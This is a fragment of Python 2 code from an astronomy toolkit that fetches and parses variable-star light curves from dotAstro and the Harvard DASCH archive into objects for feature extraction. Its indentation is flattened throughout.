pdf.savefig(fig)
pdf.close()
return
def generate_lc_snippets(lc):
epochs,mags,errs = [lc.epochs,lc.mags,lc.errs]
lc_snippets = []
n_epochs = len(epochs)
for binsize in [20,40,70,100,150,250,500,1000,10000]:
nbins = 0
if n_epochs > binsize:
bin_edges = np.linspace(0,n_epochs-1,int(round(float(n_epochs)/float(binsize)))+1)
#for chunk in list(chunks(range(n_epochs),binsize)):
bin_indices = range(len(bin_edges)-1)
np.random.shuffle(bin_indices)
for i in bin_indices:
nbins += 1
if int(round(bin_edges[i+1])) - int(round(bin_edges[i])) >= 10 and nbins < 4:
lc_snippets.append(lightCurve(epochs[int(round(bin_edges[i])):int(round(bin_edges[i+1]))],mags[int(round(bin_edges[i])):int(round(bin_edges[i+1]))],errs[int(round(bin_edges[i])):int(round(bin_edges[i+1]))],classname=lc.classname))
return lc_snippets
class Source:
def __init__(self,id,lcs,classname='unknown'):
self.lcs = []
self.lc_snippets = []
self.id = id
self.classname = classname
for lc in lcs:
self.lcs.append(lc)
self.lc_snippets.extend(generate_lc_snippets(lc))
def showInfo(self):
print "dotAstro ID: " + str(self.id) + "Num LCs: " + str(len(self.lcs))
def plotCadHists(self):
n_lcs = len(self.lcs)
if n_lcs > 0:
x = int(np.sqrt(n_lcs))
y = n_lcs/x + int(n_lcs%x > 0)
plotnum = 1
for lc in self.lcs:
plt.subplot(x,y,plotnum)
plt.hist(lc.cads,50,range=(0,np.std(lc.cads)*2.0))
plt.xlabel('Time to next obs.')
plt.ylabel('# Occurrences')
plotnum += 1
plt.show()
return
def put(self, cursor, lc_cursor):
cursor.execute("INSERT INTO sources VALUES(?, ?)",(self.id, self.classname))
for lc in self.lcs:
lc.put(lc_cursor)
def getMultiple(source_ids,classname='unknown'):
'''Returns an array of Source objects corresponding to source IDs in source_ids.
source_ids is either a filename or an array of dotAstro IDs.
'''
if type(source_ids) == str:
f = open(source_ids,'r')
ids = f.read().split()
f.close()
elif type(source_ids) == list:
ids = source_ids
# assuming dotAstro IDs:
sources = []
for id in ids:
lc = getLcInfo(id,classname)
if lc: # getLcInfo returns False if no data found
sources.append(lc)
return sources
def getLcInfo(id,classname='unknown'):
id = str(id)
isError = False
if("http" in id):
url = id
elif id.isdigit():
url = "http://dotastro.org/lightcurves/vosource.php?Source_ID=" + id
try:
lc = urllib2.urlopen(url).read()
if lc.find("<TD>") == -1:
raise urllib2.URLError('No data for specified source ID.')
except (IOError, urllib2.URLError) as error:
print "Could not read specified file.", id, error
isError = True
return False
except Exception as error:
print "Error encountered.", id, error
isError = True
return False
if not isError:
lcs = dotAstroLc(lc,id,classname)
newSource = Source(id,lcs,classname)
#print len(lcs), "light curves processed for source", id
return newSource
return
def dotAstroLc(lc,id,classname):
lcs = []
numlcs = 0
data = lc
soup = BeautifulSoup(data)
try:
ra = float(soup('position2d')[0]('value2')[0]('c1')[0].renderContents())
dec = float(soup('position2d')[0]('value2')[0]('c2')[0].renderContents())
except IndexError:
print 'position2d/value2/c1 or c2 tag not present in light curve file'
ra, dec = [None,None]
time_unit = []
for timeunitfield in soup(ucd="time.epoch"):
time_unit.append(timeunitfield['unit'])
for data_table in soup('tabledata'):
epochs = []
mags = []
errs = []
for row in data_table('tr'):
tds = row("td")
epochs.append(float(tds[0].renderContents()))
mags.append(float(tds[1].renderContents()))
errs.append(float(tds[2].renderContents()))
if len(epochs) > 0:
lcs.append(lightCurve(epochs,mags,errs,ra,dec,id,time_unit[numlcs],classname))
numlcs += 1
return lcs
def getMultipleLocal(filenames,classname='unknown'):
sources = []
for filename in filenames:
sources.append(getLocalLc(filename,classname))
return sources
def csvLc(lcdata,classname='unknown',sep=',',single_obj_only=False):
lcdata = lcdata.split('\n')
epochs = []
mags = []
errs = []
for line in lcdata:
line = line.replace("\n","")
if len(line.split()) > len(line.split(sep)):
sep = ' '
if len(line) > 0:
if line[0] != "#":
if sep.isspace():
els = line.split()
else:
els = line.split(sep)
if len(els) == 3:
epochs.append(float(els[0]))
mags.append(float(els[1]))
errs.append(float(els[2]))
elif len(els) == 2:
epochs.append(float(els[0]))
mags.append(float(els[1]))
else:
                    print len(els), "elements in row - csvLc()"
if len(epochs) > 0:
if single_obj_only:
lc = lightCurve(epochs,mags,errs,classname=classname)
else:
lc = [lightCurve(epochs,mags,errs,classname=classname)]
return lc
else:
print 'csvLc() - No data.'
return []
def getLocalLc(filename,classname='unknown',sep=',',single_obj_only=False,ts_data_passed_directly=False,add_errors=False):
if ts_data_passed_directly:
lcdata = filename
for i in range(len(lcdata)):
try:
if len(lcdata[i])==2 and add_errors:
lcdata[i] = lcdata[i] + ["1.0"]
lcdata[i] = ','.join(lcdata[i])
except TypeError:
for j in range(len(lcdata[i])):
lcdata[i][j] = str(lcdata[i][j])
if len(lcdata[i])==2 and add_errors:
lcdata[i] = lcdata[i] + ["1.0"]
lcdata[i] = ','.join(lcdata[i])
else:
f = open(filename, 'r')
lcdata = []
for line in f.readlines():
if line.strip() != "":
if len(line.strip().split(sep)) == 2 and add_errors:
line = line.strip()+sep+"1.0"
lcdata.append(line.strip())
f.close()
lcdata = '\n'.join(lcdata)
if lcdata.find("<Position2D>") > 0 and lcdata.find("xml") > 0:
lcs = dotAstroLc(lcdata,filename,classname)
else:
lcs = csvLc(lcdata,classname,sep,single_obj_only=single_obj_only)
if single_obj_only:
return lcs
else:
#print len(lcs), "light curves processed for", filename
newSource = Source(filename,lcs,classname)
return newSource
def generate_timeseries_features(filename,classname='unknown',sep=',',single_obj_only=True,ts_data_passed_directly=False,add_errors=True):
lc_obj = getLocalLc(filename,classname=classname,sep=sep,single_obj_only=single_obj_only,ts_data_passed_directly=ts_data_passed_directly,add_errors=add_errors)
features_dict = lc_obj.generate_features_dict()
return features_dict
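# Hedged sketch (the toy rows are made up): generate_timeseries_features() can
# take either a local "time,mag[,err]" file path or, as here, raw rows passed
# directly; missing error columns are padded with "1.0" when add_errors is True.
def _demo_features_from_rows():
    rows = [[0.0, 14.2], [0.7, 14.1], [1.5, 14.3], [2.1, 14.2]]
    return generate_timeseries_features(rows, ts_data_passed_directly=True)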
def dotAstro_to_csv(id):
id = str(id)
isError = False
if("http" in id):
url = id
elif id.isdigit():
url = "http://dotastro.org/lightcurves/vosource.php?Source_ID=" + id
else:
print "dotAstro ID not a digit."
try:
lc = urllib2.urlopen(url).read()
if lc.find("<TD>") == -1:
raise urllib2.URLError('No data for specified source ID.')
except (IOError, urllib2.URLError) as error:
print "Could not read specified file.", id, error
isError = True
return False
except Exception as error:
print "Error encountered.", id, error
isError = True
return False
lcs = []
numlcs = 0
lcdata = lc
soup = BeautifulSoup(lcdata)
try:
ra = float(soup('position2d')[0]('value2')[0]('c1')[0].renderContents())
dec = float(soup('position2d')[0]('value2')[0]('c2')[0].renderContents())
except IndexError:
print 'position2d/value2/c1 or c2 tag not present in light curve file'
ra, dec = [None,None]
time_unit = []
for timeunitfield in soup(ucd="time.epoch"):
time_unit.append(timeunitfield['unit'])
for data_table in soup('tabledata'):
csv_str = ""
for row in data_table('tr'):
tds = row("td")
if len(tds) == 3:
csv_str += ','.join([str(tds[0].renderContents()),str(tds[1].renderContents()),str(tds[2].renderContents())]) + '\n'
if len(csv_str) > 0:
lcs.append(csv_str)
numlcs += 1
return lcs
testurl = 'http://timemachine.iic.harvard.edu/search/lcdb/astobject/lightcurve/135278496/download=ascii/pro=cal/'
def parse_harvard_lc(id):
id = str(id)
url = "http://timemachine.iic.harvard.edu/search/lcdb/astobject/lightcurve/ID/download=ascii/pro=cal/".replace("ID",id)
lc = urllib2.urlopen(url).read().split("\n")
lcdata = ""
for line in lc:
if len(line) > 0:
if line[0] != "#":
lcdata += ",".join(line.split()) + "\n"
return [lcdata]
|